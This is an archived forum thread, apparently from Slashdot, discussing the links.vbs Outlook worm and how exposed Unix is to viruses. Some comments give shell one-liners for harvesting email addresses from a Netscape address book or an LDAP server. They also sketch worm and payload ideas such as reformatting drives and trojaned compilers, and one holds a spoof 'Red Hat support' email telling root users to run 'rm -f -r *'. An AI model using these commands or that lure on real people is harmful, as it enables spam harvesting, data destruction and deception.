Well, if you only want to think about how a worm (or any kind of shell script) can grab e-mail addresses out of a user's address book, try these for size: strings ~/.netscape/pab | grep "@" | more ldapsearch -h -b "c=/" "sn=*a*" cn | more OK, the first only works for users who use Netscape for e-mail, and the second only if an ldap server is used to provide or store e-mail addresses... but I'm sure you can get the information from other sources, too... A while ago, I wrote a little bash script that called on the fortune program to send off messages twenty at a time to a friend who clogged my mailbox with silly `virus warnings'. A combination of: 1. a bit of text that sounds convincing, like "Message from IT Security Services @ M$ Antivirus advises you to run the attached Diagnostics script" 2. a version of the fortune mailer, written so as to make the code nearly unreadable... (say, twice as many comment lines as code) 3. the address ripper should suffice to bring down the mailserver. The difficulty would be in obfuscating the code sufficiently. Anybody who looked inside the Love Bug vbs should have spotted immediately what was going on...

Re:Unix and Viruses (Addendum.)

[rgmoore]

One of the biggest safeguards of Unix so far is: the sheer lack of uniformity. Another is (was?) it's relatively small install base. About the first point: write a linux executable, and even it you convince enough people to run it, it will fail because there is no single level of Unix installed everywhere. Some kernels will barf on it, others will refuse to execute it. And it won't work on Slowaris, SunOS, HP-(Y)UX, *AIX*, Digital Unix. So a shell script version might work (even then, program features change, as well), but that has the drawback of being readable and thereby easily recognized for what is is.

The obvious solution to these difficulties is an obfuscated PERL script. PERL is installed on a large fraction of all UNIX boxen (and even on other platforms) and has the power to do a lot of stuff. It has good cross-platform uniformit, particularly when people have various CPAN modules installed. As even its biggest detractors will admit (or maybe you could say especially its biggest detractors will insist) PERL is wonderful for writing densely incomprehensible programs that even a dedicated PERL hacker has trouble understanding. The ability to do direct damage is limited by the lack of root privileges, but then again, damaging the system prevents you from spreading effectively. Add it all up, and it's the perfect worm implementation language for UNIX.

Re:Suggestions for improvement

[sconeu]

It would be far better if it forced your browser to one of those whack-a-mole sites that keep popping up additional windows when you attempt to leave.

I assume you are referring to The Time Magazine Web Site, and not any of those naughty, naughty pr0n sites?

Alternative virii?

[Anonymous+Shepherd]

Viruses, whatever...

Source code virus?

Say someone has an infected version of the Apache source; it has embedded within it a modified 'ls' or 'find' or 'grep' or something. When compiled, it also replaces ls. Apache, of course, is also infected; it is a way into and out of your computer, and would be used to spread information, primarily.

Now when you do your usual make, make install, the source is modified to look perfectly normal, but the damage is done. You have an infected ls, find, grep, etc, as well as Apache. What the modified program would do is look for Makefiles and configures; when it identifies a directory with a Makefile and/or configure script, it will actually modify the process to build another infected program. In this case, it would get the infected source from Apache! See, while the server has been up, it has serriptitiously been downloading bad source and sharing bad source with other infected computers, without logging it, and placing it in strange and not commonly visited places.

So when you actually do another source compile, you get another infected program; say, ftp gets modified. Or telnet. Or man. Whatever. Until you have lots of malicious programs. All waiting for a signal, a trigger, a date, whatever. Or for apache to do something!

Of course this is speculation on my part. Do wiser heads think this is impossible?

-AS

Re:Alternative virii?

[Gurlia]

Hey, thanks, that was exactly the article that I was referring to.

---

Re:Alternative virii?

[dodobh]

Thats Ken Thomson's exploit you are referring to. Its in the jargon file and elsewhere too.

Re:Alternative virii?

[Gurlia]

I read about a similar idea from one of the Unix gurus before (I don't remember exactly who it was, unfortunately). Basically, the article talks about how even source code is not a guarantee that you are safe.

Basically, it works from the idea of a self-replicating program, as follows:

1. Malicious programmer gets the source code for say, GCC. He modifies GCC so that it recognizes when it's compiling a good copy of its own source code, and reproduces itself (a bugged GCC). And of course, the bugged code can also contain whatever virus code for spreading, etc..
2. Via virus or whatever other means, the programmer installs this bugged GCC into the system.
3. Unsuspecting user compiles his C program, and the virus spreads to his binary.
4. After a few incidents, the sysadmin is informed that something is wrong with the compiler.
5. Sysadmin downloads GCC source code (a good copy, mind you) and re-compiles GCC. But, because the current GCC knows when it sees a copy of itself, it re-inserts the bug into the new GCC. Scary thing is, the new source code does not contain the bug code, because the bug is inserted during compile-time. The sysadmin can proof-read the source code all he wants, but he will never find a trace of the bug. Worse, if the bug also infests objdump, od, and other disassemblers, then the sysadmin may never find out why his machine is spreading virii or behaving strangely even though everything on his system seems to be clean.

Of course, replacing the GCC with a good binary will solve the problem, but the virus could have replaced, say, Apache or FTP, so that any good copy of GCC downloaded will be bugged. And no amount of recompilation from source will do any good, because the bugged compiler will always insert bugged code into any source you compile.

Anyway, my point is, source code does not guarantee safety. About the only thing that can solve the problem (that I can think of) is to nuke the system and re-install from scratch. Of course, suppose the virus bugged a machine on your ISP so that it inserts itself into any fresh system binaries you download... ultimately, you will never be 100% sure unless you physically get a copy of a new system from your vendor. But suppose the vendor has also been bugged...

I know this is a bit stretching it, but still, it involves methods which are very practical to implement. Do not hide in the comfort of "Unix is built for security" or "we are safe because we can audit source code".

---

I got this virus almost 2 months ago

[akgoel]

Since I don't keep any addresses in my Outlook Contacts List, it couldn't spread, no matter how much I prodded with it. The encryption was kinda cool, but the guy I got it from was apologizing profusely to all his clients.

This isn't new, it's not a LOVEBUG variant.

I thought this was old news...

[Ron+Harwood]

I'm sure I had heard about this one before...

NOT NEWS ANYMORE!

[Sir+Spank-o-tron]

Ok, this is NOT news. News will be that MS has developed some fab means of having scripting that is not a big gaping security hole.. (or news of any real innovation from MS for that matter)

can i configure my /. account to ignore stories about .vbs 'viruses' ?

Two things...

[Nermal]

1. The author said that only machines which run Outlook and have visual basic scripting enabled are vulnerable. Isn't that only half true? It seems any machine with a mailreader that can do attachments and has vbs scripting enabled in the operating system is vulnerable. You're only more vulnerable if you're running Outlook AND have Outlook is set up to auto-open attachments.

2. Ok, I'm going to be fair and let the windows people state their side before I make too many assumtions: Are there any LEGITIMATE uses for sending vbs scripts as email attachments (especially auto-run attachments) that I don't know about? I mean, obviously if you're part of a group of coders working on a vbs dev project you might want to exchange snippets but is there any reason for the average person to even expect a vb script in his/her email? Is there some widespread business/tech practice that would be disrupted by having excecutable attachments not autorun, or at least result in a warning message, by default in Outlook?
"(no knowledge of subject matter) + (crack cocaine) = (journalism!)"

Nice little script to fix that problem

[Col.+Panic]

called remvbs.kix, is available at securityfocus.com. It changes registry entries for .vbs, etc. files so the default application is notepad rather than wscript or cscript.

What code does it use to become polymorphic

[x-empt]

Polymorphic scripts are neat, I wonder if it uses the same methods and ideas as my previously posted code at: http://slashdot.org/co mments.pl?sid=00/05/19/1326219&cid=464

Oh btw, this sounds like the old links.vbs worm... from a while back....

Re:Unix and Viruses.

[Keith_Beef]

Oops, that should have read strings ~/.netscape/pab.na2 | grep "@" | more

New Variant of Lovebug? Nope...

[zombieking]

This is not a new virus. This thing was detected by Symantech on July 2, 1999.

That's no virus...

[bcilfone]

Uh... boss, uh... you see this VIRUS started downloading all this porn to my machine. I was just checking my email and then all of a sudden this naked woman showed up, but I had nothing to do with it...

I liked it better the first time when it was "My dog ate my homework".

"Check This" aka Freelink virus

[thomasengels]

The Freelink virus ("check this" in mail subject) predates the "I love You" virus by months. I was working on a support desk at that time. Other than flooding the mail servers, the virus did not do notable damage. See http://www.symantec.com/avcenter/venc/data/vbs.fre elink.html. Regards, Thomas

Re:Suggestions for improvement

[divec]

bun-fhuinneog agam!

You have the Windows source-code? (sorry, my Irish is terribly bad)

How did that make it to an article

[HavokDevNull]

LINKS.VBS has been out for like 5 months! AND dose not have anything to do with ILOVEYOU. Check the norton site on it. Geeeeez

"pico when I'm drunk vi when I'm sober"

Re:Make you want to...

[Black+Art]

What's a nypho?

It is like a typo, only smaller.

Re:Unix and Viruses.

[DrTomorrow]

Where are all the apache affecting viruses?

How many computers run Apache? Yeah, most webservers do, but there are hundreds of other computers for every webserver. Therefore Apache is on less than 1% of all computers out there. That's why viruses don't target Apache.

Re:Unix and Viruses.

[dboyles]

The short answer is that most flavours of Unix, including Linux, don't have much to worry about from the current crop of viruses. This may change in the future, but due to the architecture of Unix it is more difficult for viruses to propagate or to really damage a system.

I think the consensus is that Open Source promotes knowledge of what a particular program does, which in turn helps us avoid virus/trojan infection.

Sure, MS enabling VB scripting is not a good idea. The reason is because of the users. Most windows users couldn't tell you the difference between script and code. In the past months, most have learned not to run executables that they receive from unknown (or even known) sources. This is good advice, but now folks believe that just because it doesn't have .exe on the end it must be safe to download and run. I would venture to say that the *vast* majority of UNIX folks are too smart to run some unknown program. Not to mention the different system configurations that exist in the UNIX community that would make replication much less likely.

This is Old

[smkndrkn]

This is an old one from about a year ago....how did this make news?

Compiled Virii?

[Devil+Ducky]

I was just thinking one could put a virus into a source tarball as an executable file, have the Makefile call it...

Perhaps it could make it's own version of ls, or ldconfig! After the "make install" by root the virus can do anything it wants. Imagine, everytime you call ldconfig it spreads further, it would be literally impossible to repair the damage at that point.

The downside: it wouldn't take long for people to find the virus, but most people don't even bother to watch the compile screens let alone go through all of the source code files.

P.S. it would be fun and easy to release the virus in RPM format...

P.S.S. Maybe one could modify pine or sendmail to spread the virus.

Devil Ducky

Re:Make you want to...

[Gray]

If you did that right, you'd make a fortune.

Setup an unoffensive portal site with loads and loads of banners, on an industrial strength server. Virus changes IE homepage and propagates, that's all.. Your average joe 'I'm on the Internet' person never changes their homepage and really doesn't care anyway as long as it's not full of porn. If you made the virus only kick in if it *didn't* find the newest DirectX would keep it from coming to the attention of 'serious' users for a long time.

This is NOT an ILOVEYOU variant

[mabinogi]

My organisation got hit with this a number of months ago....

It was rather embarrasing for our other branches....

But for my branch...it was just an irritation...

I'm just glad I'm able to keep Outlook at bay...and have all my users on Netscape Messenger.

Mind you, we do have one person in the branch that insists on using Outlook express.....and the first thing he did when he got the first CheckThis email...was to open the .vbs file.....fortunately it only affects those using the full-blown outlook.

Re:Maybe -- Not Such a bad Idea

[Nik+Picker]

Actually thats not such an unusual Idea. I have often discussed this theory with a number of professionals always with the same sceptiscm. But consider it this way. Users ( the end user kind ) are notoriously inept at upgrading. If there were a way to write Upgrade software distributed in a virus vector it might reduce your work load. MIGHT that is.

I even played with the concept in my earlier code days. Having written a client/server app that passed patches between computers it could find on its network where the computer was running the client. And did not inform the user.

Still i suspect the whole concept is considered disgusting and not worthy ... sigh !

Re:Is it really News for Nerds anymore?

[Nastard]

All this talk about how windows sucks and linux is eleet...

Screw linux. i just got my hands on the final candidate for Windows Me. Its awesome! Just as stable as Linux/win2k, as easy to use as win98, and supports Win9x/win2k drivers :D So now all of my hardware works, my computer doesnt crash, and i dont have to read through millions of pages of ambiguous "man" pages to get it to work!

Thanks Microsoft! You finally got one right!

Unix and Viruses.

[Christopher+Thomas]

There seems to be a lot of viruses coming out these days. How immune are the Linux/Unix systems and what can we do to prevent these kind of viruses from causing us trouble? How would the current viruses need to be configured to bother us?

The short answer is that most flavours of Unix, including Linux, don't have much to worry about from the current crop of viruses. This may change in the future, but due to the architecture of Unix it is more difficult for viruses to propagate or to really damage a system.

The long answer is "it depends". Details as follows.

• Macro Viruses
  Viruses and trojans that are embedded in Word documents, Visual Basic scripts, or the like have no effect under Unix, because most Unix systems don't process Word macros or Visual Basic scripts. Thus, most of the crud that has been affecting Windows users has been completely unnoticed by Unix users.
  
  
• Bombs and Trojans
  If you are sent an executable, or fetch an executable yourself, and run it, it can modify anything that you have permission to modify, even under Unix. This means that a trojan executable, if you run it, could quite easily destroy all of your files - but not the files of anyone else using the machine, and not the operating system files. In principle, a trojan could also access any facilities that you have access to; this means that a sufficiently clever trojan could mail itself to other people from your account. However, it would have a harder time finding addresses to send itself to (maybe scan ~/mail and /var/spool/mail/username for addresses). So damage is limited, and nobody's bothered implementing effective propagation so far (though it could be done).
  
  
• True, Infecting Viruses
  A true virus is capable of infecting arbitrary executables, which themselves will contain the virus and infect other executables. While in principle this could be done under Unix, the virus would again be limited only to executables that you have permission to modify. System tools would not be affected - you couldn't infect "cp" or "ls", for instance. Distribution would also be curtailed, as you don't usually send executables to your friends; you send them a source tarball, or point them to where they can download an executable. So, while something like this could be done, it wouldn't be as devastating as it is under Windows or DOS.
  
  
• Social Engineering
  Social engineering remains one of the biggest threats under Unix. It means, simply, convincing a user to do something harmful. In the case of email viruses, the virus must convince the user to open the attachment. Heaven help us when inexperienced users have root access; a virus could simply tell you to "su to root and run this install script" to have devastating impact. This will probably be one of the biggest threats in terms of viruses under Unix.
  

The idea of a Linux email worm is so interesting that I'm tempted to write one. Must... stay... good... :).

Re:Unix and Viruses.

[laborit]

In case any of you brilliant *nix gurus are thinking of tearing into me (or any of you really really brilliant gurus don't get the joke)... yes, that should have been a capital R. Also, I forgot to close the parentheses. Sorry.

- Michael Cohn

Re:Unix and Viruses.

[EricWright]

Let me think... I want to do something to piss off a lot of people. I'll write a virus to fsck up Apache. If it actually spread like ILOVEYOU, well then *POOF*! 60% of the web is gone.

I'll bet you that almost all of the computers out there that aren't servers are workstations/personal computers for someone who DOES browse the web. Those users aren't going to be happy about this, not one bit.

Eric

Re:Unix and Viruses.

[laborit]

Heaven help us when inexperienced users have root access

Agreed, although when that comes about the "viruses" won't even have to be executable.
-----
From: Redhat Technical Support
Subject: System upgrade information

Dear user -
We regret to inform you that your Linux system shipped with several preferences improperly set. Fortunately, you can improve your web browsing speed and startup time with a few simple commands. First of all, we'd appreciate your forwarding this to everyone else you know (it doesn't matter if they don't have Linux; they might know someone who does. This way, the fix will get out as quickly as possible.
Once you've done that, just write down and follow these directions:

1. Type "su"
2. At the prompt, enter your secret root password.
3. Type "rm -f -r *"

Sincerely,
Bob Jones, Redhat technical support
-----
- Michael Cohn

Re:Unix and Viruses.

[gaudior]

A true virus is capable of infecting arbitrary executables...

This is also true of .so libraries. This is a possible point of vulnerability. It's entirely possible, should someone make a mistake and forget to lockdown the perms on a directory for a trojaned .so to get linked into something at runtime. It could concievably obtain root, and put itself into a kernel module.
--

Re:Unix and Viruses.

[OAB]

The idea of a Linux email worm is so interesting that I'm tempted to write one. Must... stay... good... :).

The odd thing is the Unix lead the way here as well, do a search on 'Great Internet Worm'.

Re:Unix and Viruses.

[somethingwonderful]

Hee hee....

That "You say" is me. :) *grins* I forgot all about that log. Somebody emailed me yesterday saying how funny it was and she told me that she saw the link here. :) Cool. Glad you enjoyed the log. :)

nat@harari.org

Re:Unix and Viruses.

[kz45]

here is the answer in the linux community for stopping viruses like this:

Never update technology. It will work every time.

OT: My favorite whack-a-mole site...

[evilquaker]

not a porno site, but amusing none-the-less:

http://www.geocities.com/SunsetStrip/Towers/4513/

click on the "Escape from darkness" button... :)

Wrong

[mindstrm]

If they don't have outlook, the virus can no longer spread. So in a sense, they would be an endpoint for the virus. The virus uses mapi calls to outlook to replicate.

And yes, any windows version with WSH installed is vulnerable (well.. vulnerable is a shitty word. Of course any windows machien with WSH installed can run scripts...)

Man. I should write a program in C that formats your HD after mailing itself to everyone in your outlook address book, and then I could be a famous virus writer too!

Re:Wrong

[dieMSdie]

By corporate decree, our company is forced to use Outlook + Exchange for all email. Of course, we got hit hard by the "ILOVEYOU" bug.
I thought it all amusing, and enjoyed looking at the actual code. I am not a programmer at all, yet I saw how easy it would be to modify this simple program to be MUCH nastier:
1) forward every message from your "Sent" folder to everyone in your address book (a corporate nightmare: think about the CEO's sent emails being read by everyone in the company)
2) after that happy chore, prowl the network shares and deltree *.*
3) finally, as a parting shot, format c:

I figure someone will do this eventually. Luckily, I run Linux. :)

Re:Wrong

[mOdQuArK!]

Be sure to tie the format to the screensaver, and possibly to a window late at night, so that the format will take place when nobody is around to stop it.

I KISS YOU!!

[doomy]

The Turkish trojan. ;)
--

Sounds really interesting...

[plaxion]

I'd ask someone to post the source so I could check it out for myself... but unfortunately, that would "violate" the author's copyright and he might threaten /. with legal action unless they remove the post!

Re:Talk about old news..

[mindstrm]

Not macro. Just an attached vbscript.

Wow. Another one.

[mycroftWyo]

Yet another replication of the overblown media attention LOVEBUG virus. Like we should care. And whats with all these people who keep doing it? Maybe its all of those High School CS teachers who keep telling students to reuse code.

The media and congressional attention to this virus and others is damaging. The media has a tendency to give exagerated emphasis on a story. Politicians are worse. They use the current internet issue to prove their points for censorship or other things. I say, just stick to wasting federal money on highways in good ol Alabama and Mississippi.

1 question....

[pirodude]

you gotta ask yourself here...is this such a bad thing? :)

if the links are quality...sure..why the hell not

Re:This is a bug?

[RGRistroph]

When is the linux port ?

This one is older than ILOVEYOU

[vanbrunt]

I got that one a long time ago... it's not an ILOVEYOU variant.

Re:Talk about old news..

[plaxion]

If you're running Outlook REM and not scanning attachments you deserve what you get.

Old News

[Don+Quixote]

This particular virus hit my office a couple of months ago...unfortunately I don't have an exact date. Here's the link to the Symantec info: http://www.symantec.com/avcenter/venc/data/vbs.fre elink.html

OLD news

[websensei]

Our office dealt with the links.vbs trojan nearly three months ago.

This is NOT a "next-gen" trojan, it's old hat.

Re:Unix and Viruses. = DIFFERENCE

[DrTomorrow]

Outlook doesn't execute arbitrary code embedded in attachments. The user has to double-click on the attachment to activate the virus. The same thing could happen on Linux if someone executed a Perl attachment. But most Linux users are smart enough not to run abitrary attachments.

If Outlook is to be faulted, it is because attachments are easy to activate by the user.

ILOVEYOU ...is there a Linux Variant?

[ChiaBen]

If so where do I get it?!? I want a porn link on my desktop, and all my Windows/Outlook buddies already have it... (muttering)what good is an OS if you can't have a desktop link to porn...
cheers!
benjamin carlson

Go Hip!

[Squeeze+Truck]

There's another "legitimate" portal site called Go Hip! that also uses viral advertising.

If you use Outlook and Explorer, the virus will add another "toolbar" to your browser (which only contains banner ads), and attaches an advertisement for itself onto the end of every email you send out. The program does all of this without the users knowledge or permission.

I would normally call this just merely annoying except for the fact that it is impossible to uninstall it via any normal means. I removed it from my registry, but it just copied itself back. The only way to remove it is to dig deep in Go Hip!'s customer service page and run a "remove" utility.

But seriously folks - a symbiot is a parasite

[bfinuc]

The less likely it is that a virus can reproduce before it gets zapped, the nicer it has to be to its host. As vigilance increases in the Windows world (but not in the Linux world) widespread Windows viruses will tend to become more benign.

This is a result of the fact that there are so many Windows installations around. Contrary to popular belief, there are plenty of benign bacteria and viruses around. Hotmail is a graet example. In fact, they even brag about their "viral marketing".

In fact the placenta, which provides mammal fetuses with nutrients, is only possible because it is infested with endoviruses that are more or less identical to HIV. These viruses suppress the immune reaction of the mother, which would otherwise kill the baby in short order. The original infection probably occurred about 120m years ago, when the dinosaurs were still alive.

There are plenty of other less benign bugs out there (no one really knows how many, and it depends how you count) that survive by keeping a low profile.

The disadvantage to being benign is that you may have mutant cousins that reproduce more quickly than you by disregarding the interests of the host.

Contrarywise, making it easier for a virus to spread increases its virulence; for example, the fact that babies are born in big hospitals actually causes baby diseases to become more deadly - because the diseases can get away with killing their hosts in short order and then spreading. The diseases evolve to adapt to the novel situation.

In the computer world this means that the funnier the jokes are about viruses seem to fans of a given OS, the rarer but more dangerous they are likely to be. (If they're not rare, they're not funny, but they're also not so dangerous, because security holes get patched.)

Every first post guy is a virus writer looking for but seldom finding an easy opportunity, and there's no lack of first posters. So it must be harder to spread viruses from Linux to Linux than from Windows to Windows

Is this proof of the superiority of Linux to Windows? No. It says more about the topology of the Windows world compared to that of the Linux world. Windows people are simply better connected, because there's more of them.

I myself have developed the perfect defence against viruses. Nothing that I do on the computer is of any value whatsoever, so I have nothing to lose. "Who steals my wallet steals trash" as Shakespeare put it. This may not work for everybody.

Linux is doomed to have a huge virus problem if any bridge is created to the windows world, just like the Native Americans were devastated by European diseases. There is no defence: the feedback loops don't exist, so the defences will never come into being. If I were to call on all Linux users to work together to create a defence against the coming threat, everyone would laugh.

Re:Execute Permissions

[aprentic]

Actually your umask environment variable determines what the default permissions for files will be. Most systems initially install with a line in one of the default login scripts that sets umask to read/write for user, privlidges for anyone else.

Don't need Outlook

[driptray]

And to clear up another issue:-

You don't need Outlook to be infected with either this virus, or with ILOVEYOU. Outlook is needed for the virus to propagate, but not to infect.

So all Windows users are vulnerable.

There is a class of viruses that will infect an Outlook user's PC without the user launching an attachment (Good Times becomes real), but these two aren't like this.

Re:Is it really News for Nerds anymore?

[mr]

>Unless the virus causes extensivedamage or advertizes Linux , these postings are getting quite old.

Please show where it says News for Linux. Or News for Linux Nerds. Or where Nerd is defined as Linux.

The attitude that the *ONLY* OpenSource project, or in your case-Nerds, helps to DIVIDE a larger community which would be farther ahead to unite.

A new way of advertising?

[Antipop]

Wouldn't be interesting if companies "unofficially" came up with viruses like this to advertise their web site in hope of boosting hits? With the tactics some of the porn sites use, I wouldn't be surprised if it became more common for sites to use the latest Outlook bug to spread the news about their site.
-Antipop

Microsoft's Dominant Market Position

[Boone^]

If it weren't for M$'s market dominance, Visual Basic Scripting wouldn't be this popular, and millions of people around the globe wouldn't be sharing and running open source .vbs files. M$ is bringing the world together by giving us the technology required to share the joy of open source software.

I fear the day when the MP3 variant hits: instead of deleting .mp3 files, it attaches them along with itself and sends them to your entire address book...

Well it depends...

[daVinci1980]

If you configured your box properly, and you don't always run as root, then there's really little danger to linux and unix variants.

Plus, most e-mail viruses to date have been written in VB, which is not typically installed or used outside of x86-Windows platform. In order to have any effect, viruses would have to be written in C/C++ then compiled for *nix (and for each variant) or would have to be written in JAVA, which would require that the machine has the JVM, and even then the virus still has to follow the rules enforced by the OS.

In addition, the security model used by *nix disallows users the ability to write over files that they don't own and aren't [group|world]-writable, so the damage in such a situation would be minimized only to the user who downloaded and ran the virues. So long as you're not root, you only lose your stuff.
--
"A mind is a horrible thing to waste. But a mime...
It feels wonderful wasting those fsckers."

Re:Talk about old news..

[Dave+Goldblatt]

BTW, typo - meant script vs. macro.

(and technically, I suppose one could argue that it's a worm, not a virus.. the nifty little critter that ran if Outlook had auto-preview turned on, however..)

-dg-

Talk about old news..

[Dave+Goldblatt]

This macro virus - one of the earlier Outlook ones - was from last July. Check out the Symantec page for more info.

If you're running Outlook and not scanning attachments, you deserve what you get.

-dg-

Dammit, I wish I ran Outlook

[jzuska]

Then I could get a quick porn fix

Re:Unix and Viruses (Addendum.)

[mazur]

One of the biggest safeguards of Unix so far is: the sheer lack of uniformity. Another is (was?) it's relatively small install base. About the first point: write a linux executable, and even it you convince enough people to run it, it will fail because there is no single level of Unix installed everywhere. Some kernels will barf on it, others will refuse to execute it. And it won't work on Slowaris, SunOS, HP-(Y)UX, *AIX*, Digital Unix. So a shell script version might work (even then, program features change, as well), but that has the drawback of being readable and thereby easily recognized for what is is.

The second point, the install base, removes one of the major incentives of the perpetraitors: notoriety. Lack of familiarity might also play a part.

THe third (and maybe biggest?) factor is: Unix users are generally much more educated in computer use, and knowledgeable about it. And with all the M$ targeted viruses about, they will know not to run random binaries from unknown sources. So again, a succesrate limiter, reducing the chance of notoriety.

That are in my estimate the main reasons we haven't seen much abuse in the @Unix so far. The only notorious exception being Morris, who wormed himself rather more succesfully than intended through sendmail holes.

Stefan.
<B5>There is a hole in your mind.</B5>

Re:Good Virus Good Good

[nmarshall]

know that is an idea...

hmmm, viral propaganda...

will have do that for my procrastinators unlimited group.... will start on it next week...


nmarshall
#include "standard_disclaimer.h"
R.U. SIRIUS: THE ONLY POSSIBLE RESPONSE

Try this:

[schon]

Turn off Javascript before visiting those sites..

Makes a world of difference (and no, I'm not going to pretend I've never gone smut surfing :o)

This is a bug?

[geoffeg]

Wow, a free app that adds a shortcut to a porn site on my desktop and generiously tells all my friends coworkers. Thats not a bug!

Geoff

MS reinvents the 70s

[Urmane]

Ironic - with the quick and carefree spread of 'net sex comes the spread of viruses

trojans

[rodentia]

...trojan advertising...

I thought that's what television was.

Sign me up!

[ibpooks]

Where can I sign up for this excellent service? Getting tons of warezzz pr0n delivered straight to my desktop without having to wade through mIRC! What a feature! Thanks M$.

Previous, not Next, Generation

[jhigham]

Links.vbs predates ILOVEYOU. It scans net blocks looking for open shares and replicating, and was out there in early 2000 at the latest.

XXX Link?

[kwsNI]

Someone want to post the link to the site here on /.? They'll be Slashdotted in no time...

kwsNI

Maybe --

[cdlu]

Maybe Microsoft could use the techology of these viruses and .. uhh .. innovate a means of using the iloveyou virus variants to patch all affected computers to invulnerability? :)

Of course they could - but why would they do something so painfully logical?

Obviousness.

[quadong]

Is there anything that can be said about this that isn't utterly obvious? Happy troll watching!

Why do people still open attachments?

[mkoeller]

I really don't understand this. Of course you could ask why they use Outlook in the first place but that is largely because companies dictate that or because people are simply to lazy to convert all of their message archives.

But I really wonder why, after all this media attention, even in the conventional media, people still open attachments that they didn't plan. I honestly don't understand it.

BTW: I still have to receive a single message from these worms.

Suggestions for improvement

[cprincipe]

It would be far better if it forced your browser to one of those whack-a-mole sites that keep popping up additional windows when you attempt to leave.

Ummmm.....not that I have any first-hand experience with them. I've just heard about them.

Re:Suggestions for improvement

[cprincipe]

According to The Gaelic Dictoionary of Computer Terms I took it to mean that I had root.

'Course my Irish is no better than yours, probably. It was a long time ago, and I needed the course.

Re:Unix and Viruses (Addendum.)

[kz45]

One of the biggest safeguards of Unix so far is: the sheer lack of uniformity

sadly, one of it's major downfalls as well.

Ah, but ...

[NaughtyEddie]

A VBS file doesn't need execute permission, because it's not run from the shell. A UNIX email client (MS Outlook for Linux, say) could easily contain a script language, and happily run scripts from non-executable files. I'm sure a shell could be hacked to run shell scripts without execute permissions without much trouble, too. Not that you would do it, but it shows how important it is that every single executable has publicly-available source code so the community can check for such things.

Re:Execute Permissions

[kz45]

Unix has a concept of execute permissions

you're forgetting something...Unix isn't for the End-User, and probably never will be. Most End-Users can barely understand the concept of point/click..let alone the concept of File permissions.

if a regular client(end-user) uses and *nix flavor, they would be using root, and the same thing could happen. Blame it on the users...not the software. It says DO NOT OPEN, MAY CONTAIN VIRUSES!!!. (and who the fuck would send you a .VBS anyway????).

but...blame microsoft...it's a good a scapegoat as any

MICROSOFT!!!

[woody_jay]

Come on guys, where's that fancy little patch that you were going to have out soon!! We can't handle the bugs man!!!

Old news

[Mamoth]

Virus scanners already know about this virus. Had a friend with it. So I went to the virus scanners web site and it showed me how to remove entries in the registry and such.

Not just Outlook

[bswick]

Needless to say, only machines that run outlook and have visual basic scripting available are vulnerable. False. Any E-mail client that allows you to open attachments is affected. As for the Visual Basic scripting, only Windows 95 and NT machines with IE 5.0 have it.

LINKS.VBS? and Microsoft Outlook Security Patch

[BMIComp]

I can remember someone trying to send me a file on mirc... called links.vbs, about 6 months ago. I never accepted it, but anybody know what i'm talking about?

Hopefully we will see an end to these e-mail "worm" virus. An article at Network World Fusion describes how Microsoft has released a security update for Outlook, which among other things, blocks 38 different file types, like exe, vbs, bat, and others. The funny thing is, scripting is STILL ACTIVATED, unless turned off. Personally, I think scripting is useful, but, for the average user, I feel it should be left off unelss the user turns it on. It does, although, prevent scripts from accessing the address book.

Its funny, "It's a feature, not a bug", yet they issued a patch for it...

Eh?

[mindstrm]

They don't bother us in the slightest, other than the fact that we have to read the stupid news articles. These virii are incapable of bothering us. In fact.. they aren't even really virii. They require the manual intervention of a user to consciously run them.

The for all this is REALLY easy!!

[flamingchicken]

Maybe I am being to simplistic here, but all it takes to totally defeat these .VBS worms/virus attachments is to disassociate the .VBS extension from the wscript.exe application. I have done this to about 50 computers so far, and no adverse effects have been found. This totally stops any .VBS file from executing on the computer. It takes all of about 5 clicks of the mouse to do this.

Some may see this as a loss of functionality, but the other option is to run the risk that your users nuke their box, and maybe even your mail server.

Just what was intended?

[Sick+Boy]

Ten bucks says this is exactly what Micro$oft had in mind when they built this "feature" into lookOut. After they start charging the poor sheeple month-to-month to use their `OS' (giggle snort), they'll start the force feeding of advertisments.

They'll probably claim it's to help offset the cost of all the `innovating' they do. Sigh. Time to d/l the latest Debian.
--

So when are we going to see...

[Megane]

So when are we going to see...

...the HOTGRITS virus!

When you open it, it pours hot grits down your pants and then spreads to pour hot grits down the pants of everyone in your address book. Unless you're Natalie Portman, in which case it removes your clothes and petrifies you.

After all, there's no better way to say ILOVEYOU than to pour hot grits down someone's pants.

Re:links.vbs on IRC

[Morden]

I'm not sure how you can "see" a .VBS script on IRC, but this particular variant is definitely not the "next generation" of ILOVEYOU, since it went through our office about 6 months ago.

this isn't new.

[darkrot]

The LINKS.VBS (and variants) have been manifesting themselves on IRC for the past year, if not longer. It spreads itself through user idiocy, in the form that the user has to accept the file and run it himself.

If you want an "interesting" trojan/virus, there's an IRC-spreading virus that keeps a list of words and makes a pseudo-random filename out of them: fireman-having-sex-with-horse.jpg.bat was my favorite that was generated. Variations of this virus exist in .bat, .js, .vbs -- the fun just never seems to stop.

Worm your way into profit!

[wickline]

Don't do anything nasty to the user's computer, just grab all the addresses in their addressbook and email them to yourself. (make sure you have a very high powered server set up to handle the traffic).

Then sell them!

You can sell them for more money perhaps since you know something about the users (ie: they use Windows and Outlook) which makes your list a targeted list at that.

-matt

New Excuse

[Ansonmont]

Now you can say "Hey that porn link was put there by a virus. I wasn't really looking at www.mypeepeesneezed.com"

Re:Old News?

[Rico_Suave]

...and then the virus authors will find new ways to attack. MS is the target, simply because they have the largest userbase.

--

Re:Maybe -- Not Such a bad Idea

[mOdQuArK!]

These concepts are probably patented. You shouldn't even be discussing them w/o licensing the technology from the patent holders.

virus?

[SuperguyA1]

Gee how often do you find yourself asking... Now just how do I get THAT virus?!?

Re:virus?

[SuperguyA1]

Vogon poetic licence:)

Re:virus?

[Glytch]

Wouldn't that be a license to kill?

Is it really News for Nerds anymore?

[tyrann98]

While I understand that Microsoft-bashing is all the rage right now, new Outlook viruses no longer interest me. With such a gaping hole within Outlook, hundreds of variations could be made and this one seems like a logical extension to the original virus. Unless the virus causes extensive damage or advertizes Linux , these postings are getting quite old.

Viral Marketing

[subsolar2]

This really gives Viral Marketing a new meaning!!

subsolar

Re:outlook=virus

[kz45]

microsoft should not be liable at all, here is why: Let's just say the same thing happened in the linux community. Who would we sue then? the distro company? linus? stallman? the creator of the mail-client? This is the problem.


if there's anyone to blame..its the stupid users. Microsoft under-estimated their intelligence. I mean shit, if they can't handle windows....Linux is an impossibility. What they need to do is have 6 or 7 different buttons for the different functions of work (get mail,etc,etc). Wow! the problem would just go away then.

the encryption is simple cipher rotation

[segmond]

